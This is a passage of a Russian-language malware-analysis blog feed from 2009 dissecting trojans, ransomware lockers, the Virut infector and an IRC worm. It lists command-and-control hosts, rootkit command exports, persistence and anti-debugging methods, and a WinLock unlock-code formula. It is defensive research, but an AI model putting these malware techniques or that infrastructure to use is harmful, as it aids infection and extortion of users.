/&gt;Date/Time Stamp(GMT): 26.02.2009 9:18&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/47580d2305e3863c10ef22c9cb3382618df349a5bef3ffb1463b46bde62e389c-1243528604&quot;&gt;http://www.virustotal.com/ru/analisis/47580d2305e3863c10ef22c9cb3382618df349a5bef3ffb1463b46bde62e389c-1243528604&lt;/a&gt;&lt;br /&gt;Программа занимается тем, что загружает и передает управление настоящей библиотеке “msvcrt.dll”. В случае если процесс, в который загружается DLL является “msiexec.exe”, запускается дополнительный поток, который извлекает из тела программ драйвер и устанавливает его в системе.&lt;br /&gt;Имя файла: UACxyxvixki.sys&lt;br /&gt;Размер: 55.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 26.01.2009 15:08&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/591602f60c8571f6b2fcb07d24d49829f0fb63caed587c531b9e82b6ee30909b-1243528879&quot;&gt;http://www.virustotal.com/ru/analisis/591602f60c8571f6b2fcb07d24d49829f0fb63caed587c531b9e82b6ee30909b-1243528879&lt;/a&gt;&lt;br /&gt;Руткит занимается тем, что скрывает установленные файлы, скрывает сетевые соединения, получает список процессов, убивает процессы, инжектится к процессам.&lt;br /&gt;Извлекает и устанавливает в систему DLL размером 30 Кб.&lt;br /&gt;Имя файла: UACemovmpjw.dll&lt;br /&gt;Размер: 30.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 26.02.2009 9:18&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/5567c1c057defe4b12be7d92a284a79502a9322bd4877e1428b4e03d142c7fcf-1243529158&quot;&gt;http://www.virustotal.com/ru/analisis/5567c1c057defe4b12be7d92a284a79502a9322bd4877e1428b4e03d142c7fcf-1243529158&lt;/a&gt; &lt;br /&gt; В таблице экспорта библиотека имеет название “tdll.dll” и 31 экспортируемую функцию. Названия функций отражают смысл их действий:&lt;br /&gt;CmdExec&lt;br /&gt;CmdExecAffID&lt;br /&gt;CmdExecBotID&lt;br /&gt;CmdExecBuild&lt;br /&gt;CmdExecSubID&lt;br /&gt;CmdExecType&lt;br /&gt;CmdExecVersion&lt;br /&gt;ConnectionHiddenAdd&lt;br /&gt;CryptKeySet&lt;br /&gt;DisallowedAdd&lt;br /&gt;FileDownload&lt;br /&gt;FileDownloadRandom&lt;br /&gt;FileDownloadRandomUnxor&lt;br /&gt;FileDownloadUnxor&lt;br /&gt;ImpersonateAsInput&lt;br /&gt;InjectorAdd&lt;br /&gt;InjectorSet&lt;br /&gt;Knock&lt;br /&gt;ModuleDownload&lt;br /&gt;ModuleDownloadUnxor&lt;br /&gt;ModuleLoad&lt;br /&gt;ModuleUnload&lt;br /&gt;ModulesVersionLog&lt;br /&gt;ProcessKill&lt;br /&gt;ProcessList&lt;br /&gt;ProcessTrustedAdd&lt;br /&gt;Reboot&lt;br /&gt;RegistryHiddenAdd&lt;br /&gt;SetCmdDelay&lt;br /&gt;SetInputDesktop&lt;br /&gt;SetTimeout&lt;br /&gt;При инициализации библиотеки создаются два потока: &lt;br /&gt;первый следит за обновлениями бота по адресу: &lt;span style=&quot;font-weight:bold;&quot;&gt;https://78.47.100.189/lcc&lt;/span&gt; &lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhviOodM5OCxR0uYMf_BGERq3HMFtngXYy49PUIQysbDfrBeImBj_qH-2hZ-GO_ccL2kwpMuPiZDKXsyZALP16Yy2X_Rom03dyi5AVgR7aGGpx3B47pa_1jI5YHNHPpfThQ9D4lbYcTJQU/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 37px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhviOodM5OCxR0uYMf_BGERq3HMFtngXYy49PUIQysbDfrBeImBj_qH-2hZ-GO_ccL2kwpMuPiZDKXsyZALP16Yy2X_Rom03dyi5AVgR7aGGpx3B47pa_1jI5YHNHPpfThQ9D4lbYcTJQU/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5341649818860983474&quot; /&gt;&lt;/a&gt;&lt;br /&gt;второй соединятся с командными серверами и выполняет команды&lt;br /&gt;&lt;span style=&quot;font-weight:bold;&quot;&gt;http://trafficstatic.net/banner/crcmds/main &lt;br /&gt;http://trafficstatic.com/banner/crcmds/main &lt;br /&gt;://symupdate2.com/banner/crcmds/main &lt;br /&gt;http://94.142.128.160/banner/crcmds/main &lt;/span&gt;&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5vVMEeLysayzLkEDrQR0zbzCmK544pTfMxYtfW_tqK6VITM-bx2fc571nOwDT2rygS5EWftdQ_gqrWvwJelY-Ob4ySuGIAqCkA0N7cDhbXr25bEwBpqquQ3uGRkr41tv6NKaXeENYFiA/s1600-h/03.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 101px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5vVMEeLysayzLkEDrQR0zbzCmK544pTfMxYtfW_tqK6VITM-bx2fc571nOwDT2rygS5EWftdQ_gqrWvwJelY-Ob4ySuGIAqCkA0N7cDhbXr25bEwBpqquQ3uGRkr41tv6NKaXeENYFiA/s400/03.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5341649819088483826&quot; /&gt;&lt;/a&gt;</description><link>http://gmax-blog.blogspot.com/2009/05/trojanwin32tdssrtf.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-4buNm2S0pNoeG39F4DfOr3nOkDno2s0mcGzHasEgOgJEQMALAD_hTuL-TxWBIZxtgDowTruF62vqqaGruPNdu3TxXv5uytuwBWwFQaRh91sqPhfJEPbgeE8uF7LqNo3B_-1sl3NUx7E/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-7689443468166615416</guid><pubDate>Fri, 08 May 2009 17:35:00 +0000</pubDate><atom:updated>2009-05-08T10:37:30.389-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">bot</category><category domain="http://www.blogger.com/atom/ns#">Delphi</category><title>Trojan.Win32.Malware</title><description>Имя файла: msncache.dll&lt;br /&gt;Размер: 51.50 Kb&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/6f2db4f23932e90a5e4c816f8c10f2e4&quot;&gt;http://www.virustotal.com/ru/analisis/6f2db4f23932e90a5e4c816f8c10f2e4&lt;/a&gt; &lt;br /&gt;Бот работает в качестве сервиса. Написан на Delphi. Не чем не упакован, нет защиты. В первую очередь расшифровываются строки, и инициализируется импорт. Устанавливает себя как сервис. Поддерживает сбор информации, обновление, скачивание и запуск программ. C&amp;C по адресам:&lt;br /&gt;&lt;span style=&quot;font-weight:bold;&quot;&gt;bfkq.com&lt;br /&gt;74.54.201.210&lt;br /&gt;174.133. 72.250&lt;br /&gt;jsactivity.com&lt;br /&gt;74.55.37.210&lt;br /&gt;174.133.126.2&lt;/span&gt;&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4kvQlSg0DUb-YZEaDQuZO7xp-aHljklQUYCRxFftIVlkU8gMs1HP9Dw-wmB9NlVCCxQPAbiwWtIuigC67_iAt-yFUtvK0_3L_bvcr2hN5JHlNg0KcvIVn8f7hRmb65wiRo9GJtlFkfw4/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 91px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4kvQlSg0DUb-YZEaDQuZO7xp-aHljklQUYCRxFftIVlkU8gMs1HP9Dw-wmB9NlVCCxQPAbiwWtIuigC67_iAt-yFUtvK0_3L_bvcr2hN5JHlNg0KcvIVn8f7hRmb65wiRo9GJtlFkfw4/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5333508351491837170&quot; /&gt;&lt;/a&gt;</description><link>http://gmax-blog.blogspot.com/2009/05/trojanwin32malware.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4kvQlSg0DUb-YZEaDQuZO7xp-aHljklQUYCRxFftIVlkU8gMs1HP9Dw-wmB9NlVCCxQPAbiwWtIuigC67_iAt-yFUtvK0_3L_bvcr2hN5JHlNg0KcvIVn8f7hRmb65wiRo9GJtlFkfw4/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-976833937590230104</guid><pubDate>Tue, 05 May 2009 15:21:00 +0000</pubDate><atom:updated>2009-05-05T08:27:27.746-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Ransom</category><category domain="http://www.blogger.com/atom/ns#">SMSer</category><title>Trojan-Ransom.Win32.SMSer.az</title><description>Имя файла: foto334.scr.exe&lt;br /&gt;Размер: 71.50 Kb 180.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 09.04.2009 14:48&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/dc33404760b1ace3ebfc065c766d1169&quot;&gt;http://www.virustotal.com/ru/analisis/dc33404760b1ace3ebfc065c766d1169&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=b7331347c2c797440135b40ed37c335c&quot;&gt;http://www.threatexpert.com/report.aspx?md5=b7331347c2c797440135b40ed37c335c&lt;/a&gt;&lt;br /&gt;Устанавливает и запускает в системе 3 программ.&lt;br /&gt;Имя файла: exploree.exe&lt;br /&gt;Размер: 71.50 Kb&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/800f91d41cb59071c6882636490342c6&quot;&gt;http://www.virustotal.com/ru/analisis/800f91d41cb59071c6882636490342c6&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=02e4c35d3408466bb3da529c02d0cbcc&quot;&gt;http://www.threatexpert.com/report.aspx?md5=02e4c35d3408466bb3da529c02d0cbcc&lt;/a&gt; &lt;br /&gt;Троян Pinch. Ворует пароли от большого числа программ, отправляет по адресу &lt;span style=&quot;font-weight:bold;&quot;&gt;www.absolute-speakers.co.uk&lt;/span&gt;&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_gvf8a77sh2w1W5UgMbHTaJiFtTQbh2x-Vwbune0m8k1b00czr6MU8WBUW5kJRoGl2GHo7uiaol4VOdfu-dvprNfhiYkqtBQSFNNMdnng3P9QLp18Y7xWqCAJOsnevT7-Rfc5CwstpcY/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 43px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_gvf8a77sh2w1W5UgMbHTaJiFtTQbh2x-Vwbune0m8k1b00czr6MU8WBUW5kJRoGl2GHo7uiaol4VOdfu-dvprNfhiYkqtBQSFNNMdnng3P9QLp18Y7xWqCAJOsnevT7-Rfc5CwstpcY/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5332360771283690402&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Имя файла: lsaass.exe&lt;br /&gt;Размер: 99.00 Kb&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/a769c5772c4099e565fea300a33d2158&quot;&gt;http://www.virustotal.com/ru/analisis/a769c5772c4099e565fea300a33d2158&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=e23b5e2e4b41d50c4510467323921e03&quot;&gt;http://www.threatexpert.com/report.aspx?md5=e23b5e2e4b41d50c4510467323921e03&lt;/a&gt; &lt;br /&gt;Троян блокирует работу системы, выводит сообщение с требованием выкупа:&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJLrzAye277wyO4aXDnaCKt-eCE2GMFbTezw4FMS7srA25NCg6eV4XEnRcjxxC491QfYa_41c0x7h1YgYxWe_ZyxkD8U5zkzvnQgXA_yEaWTww1CmBUAZ_iASYJ6fTBUBCpEuTjULs-Ho/s1600-h/02.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 298px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJLrzAye277wyO4aXDnaCKt-eCE2GMFbTezw4FMS7srA25NCg6eV4XEnRcjxxC491QfYa_41c0x7h1YgYxWe_ZyxkD8U5zkzvnQgXA_yEaWTww1CmBUAZ_iASYJ6fTBUBCpEuTjULs-Ho/s400/02.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5332360768753233314&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Предусмотрено 6 вариантов текста для отправки СМС: oper, safin, serzh, muzzon, jaxx, tupak. Для разблокировки нужно ввести слово – &lt;span style=&quot;font-weight:bold;&quot;&gt;vash&lt;/span&gt;. &lt;br /&gt;Имя файла: tmp365.exe&lt;br /&gt;Размер: 2.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 08.04.2009 19:42&lt;br /&gt;Написан на ассемблере, запускает поток, который пытается удалить файлы exploree.exe и lsaass.exe, а затем удаляет сам себя.</description><link>http://gmax-blog.blogspot.com/2009/05/trojan-ransomwin32smseraz.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_gvf8a77sh2w1W5UgMbHTaJiFtTQbh2x-Vwbune0m8k1b00czr6MU8WBUW5kJRoGl2GHo7uiaol4VOdfu-dvprNfhiYkqtBQSFNNMdnng3P9QLp18Y7xWqCAJOsnevT7-Rfc5CwstpcY/s72-c/01.JPG" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-7518455247453546175</guid><pubDate>Wed, 29 Apr 2009 16:42:00 +0000</pubDate><atom:updated>2009-04-29T10:31:12.835-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Winlock</category><title>Trojan-Ransom.Win32.Blocker</title><description>Имя файла: xvidDecoder60.exe&lt;br /&gt;Размер: 101.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 14.04.2009 15:34&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/26e9e579b640bed619561b23c10ce799&quot;&gt;http://www.virustotal.com/ru/analisis/26e9e579b640bed619561b23c10ce799&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=ad2067912176a415afe89e43686507af&quot;&gt;http://www.threatexpert.com/report.aspx?md5=ad2067912176a415afe89e43686507af&lt;/a&gt;&lt;br /&gt;Дропер трояна WinLock, извлекает в папку темп файл с рандомным именем и префиксом don. Устанавливает его в автозагрузку, дописав на старте к userinit.exe.&lt;br /&gt;Имя файла: don2.tmp.exe&lt;br /&gt;Размер: 110.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 14.04.2009 15:34&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/15168836395103bf6b573acf8bb8fe85&quot;&gt;http://www.virustotal.com/ru/analisis/15168836395103bf6b573acf8bb8fe85&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=c4d964a404ac82a5f1fa44237fe52f6b&quot;&gt;http://www.threatexpert.com/report.aspx?md5=c4d964a404ac82a5f1fa44237fe52f6b&lt;/a&gt;&lt;br /&gt;Файл сильно замусорен, очень много лишнего кода. Создает дополнительный десктоп на нем рисует следующею картинку: &lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXH9loiBWNf-vP2ymfIji0aLavsBsLE0dEc1bmL98vUI0ilkJkFwTCvHA-kRdTAY0L2oMexxm8UdYQ5iZ74-BL0EFZdziAR8kBt4wRWtWHg5thGGT1-MziNirkB3X5DkCw2XClboSPFh4/s1600-h/02.GIF&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 251px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXH9loiBWNf-vP2ymfIji0aLavsBsLE0dEc1bmL98vUI0ilkJkFwTCvHA-kRdTAY0L2oMexxm8UdYQ5iZ74-BL0EFZdziAR8kBt4wRWtWHg5thGGT1-MziNirkB3X5DkCw2XClboSPFh4/s400/02.GIF&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5330157551800851074&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Код генерится на основе версии Windows и текущей даты. Если просто нечего не делать, то это спустя пару часов блокировка будет снята, а файл самоудалится. Код для снятия блокировки генерится по формуле: &lt;br /&gt;(((((((X/(2^16))&amp;15)*149)%167)*16+(((X/(2^12))&amp;15)*108)%151)*16+(((X/(2^8))&amp;15)*31)%163)*16+(((X/(2^4))&amp;15)*29)%179)*16+((X&amp;15)*53)%197=&lt;br /&gt;, где X число из текста СМС равено числу текста СМС начиная с 4 символа&lt;br /&gt;Командный центр: &lt;span style=&quot;font-weight:bold;&quot;&gt;f3g3fff3fggff3.com&lt;/span&gt;&lt;br /&gt;Имя файла: _don18.exe&lt;br /&gt;Размер: 133.00 Kb&lt;br /&gt;Date/Time Stamp(GMT): 24.04.2009 14:32&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/dbe138abe259534aa6c3b199156b0faf&quot;&gt;http://www.virustotal.com/ru/analisis/dbe138abe259534aa6c3b199156b0faf&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=ea90969e13d2061054e8dd276720d0d0&quot;&gt;http://www.threatexpert.com/report.aspx?md5=ea90969e13d2061054e8dd276720d0d0&lt;/a&gt;&lt;br /&gt;Код очень похож на предыдущей экземпляр, похожее окошко:&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5So9fi05TaWk5sm6bSGksX6iF_AE_g_ul9zwkOfA4M46VxjLKU_1njWYxCDnQ7VcnVZeDbwahpl5ECwVM6iS4mDPTDaLo8gwYy5ps_1btMCpc6sLyyaAO0XatbZdTtLMVEyGExBjLmTM/s1600-h/01.GIF&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 275px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5So9fi05TaWk5sm6bSGksX6iF_AE_g_ul9zwkOfA4M46VxjLKU_1njWYxCDnQ7VcnVZeDbwahpl5ECwVM6iS4mDPTDaLo8gwYy5ps_1btMCpc6sLyyaAO0XatbZdTtLMVEyGExBjLmTM/s400/01.GIF&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5330157908568180690&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Код для анлока вычисляется по той же формуле, только X – начиная с третьего символа, по два символа через один (для кода с картинки X=676200). Командный центр: &lt;span style=&quot;font-weight:bold;&quot;&gt;91.212.132.180&lt;/span&gt;</description><link>http://gmax-blog.blogspot.com/2009/04/trojan-ransomwin32blocker.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXH9loiBWNf-vP2ymfIji0aLavsBsLE0dEc1bmL98vUI0ilkJkFwTCvHA-kRdTAY0L2oMexxm8UdYQ5iZ74-BL0EFZdziAR8kBt4wRWtWHg5thGGT1-MziNirkB3X5DkCw2XClboSPFh4/s72-c/02.GIF" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-699350023585216517</guid><pubDate>Fri, 24 Apr 2009 15:58:00 +0000</pubDate><atom:updated>2009-04-24T09:01:40.508-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Virus</category><category domain="http://www.blogger.com/atom/ns#">Virut</category><title>Virus.Win32.Virut.av</title><description>Имя файла: NOTEPAD.EXE&lt;br /&gt;Размер: 74.50 Kb&lt;br /&gt;Date/Time Stamp(GMT): 04.08.2004 6:05&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/40352a18cbc7be8d8c17ef4c670cb7c7&quot;&gt;http://www.virustotal.com/ru/analisis/40352a18cbc7be8d8c17ef4c670cb7c7&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=127c54b4211f076ef745788acbd3bdaa&quot;&gt;http://www.threatexpert.com/report.aspx?md5=127c54b4211f076ef745788acbd3bdaa&lt;/a&gt; &lt;br /&gt;Обычный блокнот заражен вирусом Virut. Размер файла увеличился на 7 Кб. Увеличение за счет расширения последней секции файла, в данном случаи секции ресурсов. Переход на добавленный код сразу на точке входа. Сначала вирус расшифровывает свое тело, затем создает мэпируемую секцию “SectVirtu”, добавляет себе отладочные права, перебирает процессы в системе, затем к пятому по счету процессу (winlogon.exe), мэпируется созданная секция и делает инжект (CreateRemoteThread). В новом потоке производится запись в файл “C:\WINDOWS\system32\DRIVERS\ETC\HOSTS” строки “127.0.0.1 NtKrnlpa.info”. Из ветки “SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer” читает ключ TargetHost. Затем в ветку &quot;SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List&quot; добавляется исключение для встроенного фаервола.&lt;br /&gt;Затем идет запрос на командный сервер &quot;&lt;span style=&quot;font-weight:bold;&quot;&gt;proxim.ntkrnlpa.info&lt;/span&gt;&quot;&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYDVdAMBv-EU9QPvu7qgXFVlT7dFbYFMQ-gawNyqscj09nU6ZBo_o8T0a6E8rqrG5eY6BLXRUB0aavZhabs8HDV3q8t4kYk-35cmXhqG5UfUNRdSpCncmAqQtSfzOtq1DHW4cw3k5E3HY/s1600-h/1.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 55px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYDVdAMBv-EU9QPvu7qgXFVlT7dFbYFMQ-gawNyqscj09nU6ZBo_o8T0a6E8rqrG5eY6BLXRUB0aavZhabs8HDV3q8t4kYk-35cmXhqG5UfUNRdSpCncmAqQtSfzOtq1DHW4cw3k5E3HY/s400/1.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5328288414654684962&quot; /&gt;&lt;/a&gt;</description><link>http://gmax-blog.blogspot.com/2009/04/viruswin32virutav.html</link><author>noreply@blogger.com (GMax)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYDVdAMBv-EU9QPvu7qgXFVlT7dFbYFMQ-gawNyqscj09nU6ZBo_o8T0a6E8rqrG5eY6BLXRUB0aavZhabs8HDV3q8t4kYk-35cmXhqG5UfUNRdSpCncmAqQtSfzOtq1DHW4cw3k5E3HY/s72-c/1.JPG" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7303348839427374548.post-2029511229273921530</guid><pubDate>Tue, 14 Apr 2009 17:35:00 +0000</pubDate><atom:updated>2009-04-14T10:39:22.637-07:00</atom:updated><title>Net-Worm.Win32.Kolabc.gda</title><description>Имя файла: unwise_.exe&lt;br /&gt;Размер: 137 Кб&lt;br /&gt;Time/Date Stamp (GMT): 26 марта 2009 г. 06:03:13&lt;br /&gt;&lt;a href=&quot;http://www.virustotal.com/ru/analisis/a4ec604685deb703f90bcc59cd775a47&quot;&gt;http://www.virustotal.com/ru/analisis/a4ec604685deb703f90bcc59cd775a47&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.threatexpert.com/report.aspx?md5=bf3e95a24e203f680465e165ba4a02b1&quot;&gt;http://www.threatexpert.com/report.aspx?md5=bf3e95a24e203f680465e165ba4a02b1&lt;/a&gt;&lt;br /&gt;Файл в несколько слоев обернут протекторами: первый не представляет из себя нечего сложного, во втором и третьем применена антиотладка и антидамп. После распаковки оказалось, что программа написана на С++. Качество кода достаточно низкое. &lt;br /&gt;Вначале как всегда инициализация импорта. Затем идут антиотладочные проверки: IsDebuggerPresent, поиск строк VMware в реестре, проверка GetTickCount и т.д., в случаи нахождения чего-либо подозрительного программа самоудаляется с помощью BAT файла. Далее идет странная проверка на хук функции MessageBox, проверяются первые 5 байт этой функции и если это “E8 00 04 00 60” (CALL куда?), то программа зацикливается.&lt;br /&gt;&lt;a onblur=&quot;try {parent.deselectBloggerImageGracefully();} catch(e) {}&quot; href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFRQnBdptVGeN2qIoqZBhnWBXp_kx7mDna4vuWBMDaQgdbeuBQQSA1AlHGkZ3G_dXtj-KTs2OdOIZJl6izfw5QnbsYI2N2UbTVufiEfVITT9Tg7FU3ZypSJIzabC3O5Ye1SjxNVB4uzBc/s1600-h/01.JPG&quot;&gt;&lt;img style=&quot;display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 196px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFRQnBdptVGeN2qIoqZBhnWBXp_kx7mDna4vuWBMDaQgdbeuBQQSA1AlHGkZ3G_dXtj-KTs2OdOIZJl6izfw5QnbsYI2N2UbTVufiEfVITT9Tg7FU3ZypSJIzabC3O5Ye1SjxNVB4uzBc/s400/01.JPG&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5324602571145640818&quot; /&gt;&lt;/a&gt;&lt;br /&gt;После этого расшифровываются строки, часть строк зашифрована по замысловатому алгоритму, основанному на XOR, а часть с использованием алгоритм BlowFish. Файл копируется в папку FONTS и запускается как служба с именем “Windows Host Controller”. Затем запускается новый поток, который проверяет наличие мютекса &quot;gx000032&quot;, если он есть, то система уже инфицирована и процесс завершается. Программа читает ключи из ветки реестра “SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions” и если там есть ключи с именами файлов, то они удаляются. Затем в эту ветку записывается дата и время заражения, и время работы системы. Далее просматриваются и отправляются в командный центр список служб, доступность записи в реестр и общие сетевые ресурсы. Очищается кеш DNS и все журналы событий. Червь правит множество параметров в реестре для своей комфортной работы по сети, включая отключение встроенного бранмауера и проброс портов с помощью программы “netsh.exe”.&lt;br /&gt;Далее начинается непосредственно работа с командным центром. В программу зашит большой список IRC серверов, которые можно использовать для управления ботом:&lt;br /&gt;&lt;span style=&quot;font-weight:bold;&quot;&gt;cx10man.weedns.com &lt;br /&gt;fx010413.whyI.org &lt;br /&gt;gynoman.weedns.com &lt;br /&gt;c010x1.co.cc&lt;br /&gt;commgr.co.cc&lt;br /&gt;g.0x20.biz &lt;br /&gt;telephone.dd.blueline.be &lt;br /&gt;phonewire.dd.blueline.be &lt;br /&gt;phonelogin.dd.blueline.be &lt;br /&gt;ufospace.etowns.net &lt;br /&gt;theforums.bbsindex.com &lt;br /&gt;phonewire.dnip.net &lt;br /&gt;phonelogin.dnip.net &lt;br /&gt;koopa.dnip.net &lt;br /&gt;cx10man.weedns.com &lt;br /&gt;fx010413.whyI.org &lt;br /&gt;gynoman.weedns.com &lt;br /&gt;c010x1.co.cc &lt;br /&gt;commgr.co.cc &lt;br /&gt;g.0x20.biz &lt;br /&gt;telephone.dd.blueline.be &lt;br /&gt;phonewire.dd.blueline.be &lt;br /&gt;phonelogin.dd.blueline.be &lt;br /&gt;ufospace.etowns.net &lt;br /&gt;theforums.bbsindex.com &lt;br /&gt;phonewire.dnip.net &lt;br /&gt;phonelogin.dnip.net&lt;br /&gt;koopa.dnip.net&lt;/span&gt;&lt;br /&gt;Интересно, что среди большого количества функций по управлению ботом (апдейт, сбор информации, DoS, 